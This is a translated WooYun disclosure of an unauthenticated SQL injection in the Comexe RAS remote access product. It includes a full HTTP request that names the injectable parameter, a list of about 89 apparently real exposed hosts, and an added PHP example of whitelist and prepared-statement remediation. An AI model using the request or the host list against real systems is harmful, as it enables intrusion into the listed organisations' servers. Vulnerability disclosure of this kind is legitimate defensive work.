
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0124796

Title: Another SQL injection in the Comexe RAS Remote Quick Access Solution (no login required, DBA privileges)

Vendor: Shenzhen Comexe Communication Technology Co., Ltd. (深圳市科迈通讯技术有限公司)

Author: YY-2012

Submitted: 2015-07-08 11:54

Fixed: 2015-10-08 16:18

Published: 2015-10-08 16:18

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed over to a third-party partner organisation (CNCERT, the National Computer Network Emergency Response Technical Team) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-07-08: Details sent to the vendor; awaiting the vendor's response
2015-07-10: Vendor confirmed; details disclosed to the vendor only
2015-07-13: Details opened to third-party security partners
2015-09-03: Details disclosed to core white hats and domain experts
2015-09-13: Details disclosed to regular white hats
2015-09-23: Details disclosed to intern white hats
2015-10-08: Details disclosed to the public

Brief description:

89 affected instances.

Detailed description:

This is a different injectable file from the one in WooYun: Two SQL injections in a Comexe client affecting a large number of systems (no login required, DBA privileges).
All versions of the Comexe RAS Remote Quick Access Solution (remote quick application access) are affected.
SQL injection is possible without logging in.

POST /server/cmxfolder.php?pgid=AppList&SearchFlag=true&t=1433251155 HTTP/1.1
Content-Length: 118
Content-Type: application/x-www-form-urlencoded
Referer: http://183.230.42.251:81/
Cookie: PHPSESSID=jb7b826hb3p30jf2rdt17mr8n0; RAS_Client_Style=1; g_LanguageID=cn; RAS_Admin_UserInfo_Domain=aa-ecf4369da2f8; temp_DisplayName=tmtgrnvr; temp_Description=%E5%85%81%E8%AE%B8%E7%94%A8%E6%88%B7%E8%BF%9C%E7%A8%8B%E8%AE%BF%E9%97%AE%E6%AD%A4%E8%AE%A1%E7%AE%97%E6%9C%BA%E4%B8%8A%E7%9A%84%E6%96%87%E4%BB%B6%E5%A4%B9; ErrorInfo=%3Cbr+%2F%3E%E9%94%99%E8%AF%AF%E4%BF%A1%E6%81%AF%3A+Parameter+3%3A+%E7%B1%BB%E5%9E%8B%E4%B8%8D%E5%8C%B9%E9%85%8D%E3%80%82%0D%0A+++%3Cbr+%2F%3E%E9%94%99%E8%AF%AF%E6%89%80%E5%9C%A8%E6%96%87%E4%BB%B6%3A+C%3A%5CProgram+Files%5CComexe%5CRasMini%5Crasweb%5CApache2%5Chtdocs%5Csmarty-2.6.19%5CServer%5CCmxUserGroup.php+%3Cbr+%2F%3E%E9%94%99%E8%AF%AF%E6%89%80%E5%9C%A8%E8%A1%8C%E5%8F%B7%3A+386+%E8%A1%8C%3Cbr+%2F%3E
Host: 183.230.42.251:81
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
clear=%e6%b8%85%e7%a9%ba&NMFind=%e6%90%9c%e7%b4%a2&pageNo=&sort=DisplayName&sortType=A&ViewAppFld=1&ViewAppValue=1


Injectable parameter: ViewAppFld

Proof of vulnerability:

[Five screenshots were attached to the original report; the images are not available here.]


http://220.172.105.41:81/CmxDownload.php
http://125.66.20.6/CmxDownload.php
http://183.230.42.251:81/CmxDownload.php
http://221.13.104.174:8888/CmxDownload.php
http://114.135.72.241:81/CmxDownload.php
http://61.189.189.43:81/CmxDownload.php
http://202.104.138.38/CmxDownload.php
http://222.242.198.90/CmxDownload.php
http://113.106.92.83:8080/cmxlogin.php?t=14345927739642
http://122.227.188.254/cmxlogin.php?t=14345719793756
http://60.191.119.162:8080/CmxDownload.php
http://oa.wishingfoods.com:8080/CmxDownload.php
http://61.164.136.94:81/CmxDownload.php
http://58.222.218.171:8888/CmxDownload.php
http://60.191.95.21:8080/CmxDownload.php
http://58.210.192.202:8888/cmxlogin.php?t=13547228176021
http://58.211.90.4:81/CmxDownload.php
http://222.34.131.4:81/CmxDownload.php
http://60.10.34.57:8888/CmxDownload.php
http://124.67.67.99:8080/CmxDownload.php
http://58.18.169.92/CmxDownload.php
http://218.21.213.182:8000/cmxlogin.php?t=14344257908105
http://116.113.105.106:8000/cmxlogin.php?t=14344255806630
http://61.134.119.52:8000/CmxDownload.php
http://116.113.111.29:8080/CmxDownload.php
http://202.99.241.40/CmxDownload.php
http://124.67.68.166:8000/CmxDownload.php
http://183.129.249.246:8002/CmxDownload.php
http://125.88.162.31:81/CmxDownload.php
http://58.210.33.231:8080/CmxDownload.php
http://61.163.182.87:8080/CmxDownload.php
http://60.191.26.174:81/cmxlogin.php?t=14343482319389
http://61.182.242.18:8080/CmxDownload.php
http://218.94.1.157:81/CmxDownload.php
http://27.223.11.34:8001/CmxDownload.php
http://218.21.213.182:8000/cmxlogin.php?t=14343020933433
http://223.72.237.39/CmxDownload.php
http://60.10.192.106:8080/CmxDownload.php
http://122.228.122.58/CmxDownload.php
http://116.113.105.106:8000/cmxlogin.php?t=14342616673483
http://122.224.109.230:8080/CmxDownload.php
http://122.224.231.67:81/CmxDownload.php
http://221.224.94.98/CmxDownload.php
http://113.16.255.224:8080/CmxDownload.php
http://222.185.234.100:8000/CmxDownload.php
http://222.168.51.166:8000/CmxDownload.php
http://222.222.156.19:81/cmxlogin.php?t=14342148006227
http://218.59.231.170:81/CmxDownload.php
http://121.33.210.52:8000/CmxDownload.php
http://mail.ydqx.cn/cmxlogin.php?t=14341807665134
http://222.46.21.186:8080/CmxDownload.php
http://ydqx.cn/cmxlogin.php?t=14341806064013
http://218.15.164.122/cmxlogin.php?t=14341805565006
http://58.246.192.162:8001/cmxlogin.php?t=14341775326147
http://61.164.94.186:8080/CmxDownload.php
http://221.12.36.150:8000/CmxDownload.php
http://erp.ap365.com:8088/CmxDownload.php
http://123.235.22.66:8080/CmxDownload.php
http://180.166.124.162:8080/CmxDownload.php
http://60.28.142.150:81/CmxDownload.php
http://116.228.68.38:8080/CmxDownload.php
http://180.166.136.3:81/CmxDownload.php
http://61.153.216.59:8080/CmxDownload.php
http://101.68.209.2:8080/cmxlogin.php?t=14339409675130
http://222.162.50.226:8080/CmxDownload.php
http://222.85.1.76:8000/CmxDownload.php
http://mail.zypcg.com/CmxDownload.php
http://60.208.78.51:8000/CmxDownload.php
http://116.113.111.29:8080/CmxDownload.php
http://218.25.170.4:8080/CmxDownload.php
http://122.226.152.126:8080/CmxDownload.php
http://218.65.37.93:8888/CmxDownload.php
http://115.238.142.206:8080/CmxDownload.php
http://58.211.149.138:81/CmxDownload.php
http://180.169.76.3:8080/cmxlogin.php?t=14338222676437
http://61.164.50.186:8080/CmxDownload.php
http://122.224.109.227:8080/CmxDownload.php
http://220.166.160.42/cmxlogin.php?t=14337336287380
http://221.8.32.20/CmxDownload.php
http://218.71.137.102/CmxDownload.php
http://218.26.238.82:8000/cmxlogin.php?t=14337068121870
http://61.154.11.185:8888/CmxDownload.php
http://122.140.95.39:8080/CmxDownload.php
http://223.255.20.80/CmxDownload.php
http://61.132.92.51:81/cmxlogin.php?t=14336851360738
http://125.32.43.190:8080/CmxDownload.php
http://122.224.204.250:8888/cmxlogin.php?t=14336609488901
http://111.43.129.102:8888/CmxDownload.php
http://219.159.111.190:8888/cmxlogin.php?t=14336562079134

Remediation:

Filter the input.

Copyright notice: when reposting, please credit the source: YY-2012@WooYun
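For a request like the one above, "filter" in practice means two separate controls: search values are bound through prepared statements, and anything that ends up as an SQL identifier (a column selector such as ViewAppFld, or the sort column and direction in sort and sortType) is mapped through a fixed whitelist, because identifiers cannot be bound as parameters. The following PHP is an added example and not Comexe's code: the table AppList, its columns and the mapping of selector codes to columns are hypothetical, and it runs against an in-memory SQLite database through PDO (requires the pdo_sqlite extension) so that it is self-contained.

```php
<?php
// Added example, not the vendor's code. Table and column names are hypothetical.

// Vulnerable pattern: the field selector and the search value are concatenated
// straight into the query text, so either one can alter the SQL statement.
function searchAppsVulnerable(PDO $db, string $field, string $value): array
{
    $sql = "SELECT DisplayName, Description FROM AppList WHERE $field = '$value'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened pattern:
//  * identifiers (filter column, sort column, sort direction) are looked up in
//    whitelists and the request is rejected if the selector is unknown;
//  * the search value is bound as a parameter of a prepared statement.
const APP_FIELDS = [        // hypothetical mapping of ViewAppFld codes to columns
    '1' => 'DisplayName',
    '2' => 'Description',
];
const SORT_FIELDS = ['DisplayName' => 'DisplayName', 'Description' => 'Description'];
const SORT_DIRS   = ['A' => 'ASC', 'D' => 'DESC'];

function searchAppsSafe(PDO $db, string $fieldCode, string $value,
                        string $sort, string $sortType): array
{
    if (!isset(APP_FIELDS[$fieldCode])) {
        throw new InvalidArgumentException('unknown field selector');
    }
    $column  = APP_FIELDS[$fieldCode];
    $orderBy = SORT_FIELDS[$sort] ?? 'DisplayName';   // unknown sort column -> default
    $dir     = SORT_DIRS[$sortType] ?? 'ASC';         // unknown direction -> default

    // Only whitelisted identifiers reach the query text; the value is a bound parameter.
    $stmt = $db->prepare(
        "SELECT DisplayName, Description FROM AppList WHERE $column LIKE :v ORDER BY $orderBy $dir"
    );
    $stmt->execute([':v' => '%' . $value . '%']);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Self-contained demo on an in-memory SQLite database with constructed sample rows.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE AppList (DisplayName TEXT, Description TEXT)");
$db->exec("INSERT INTO AppList VALUES ('Notepad', 'Text editor'), ('Calc', 'Calculator')");

// Legitimate search: selector code 1 (DisplayName), value 'Note', sorted ascending.
print_r(searchAppsSafe($db, '1', 'Note', 'DisplayName', 'A'));

// A selector that is not in the whitelist is rejected before any SQL is built.
try {
    searchAppsSafe($db, 'Description, Secret', 'x', 'DisplayName', 'A');
} catch (InvalidArgumentException $e) {
    echo "rejected: " . $e->getMessage() . "\n";
}
```

The whitelist approach is the important part for a parameter like ViewAppFld: a column name cannot be passed as a bound parameter, so escaping it is not enough, and the only safe option is to accept a small set of known selector values and map them to fixed identifiers server-side. Binding the search value additionally protects the LIKE clause; if wildcard characters in user input matter, they can be escaped separately, but that is a search-quality concern rather than an injection one.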


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 17

Confirmed: 2015-07-10 16:17

Vendor reply:

CNVD has confirmed and reproduced the described issue, and has notified the software vendor through the publicly listed contact details on its website.

Latest status:

None yet.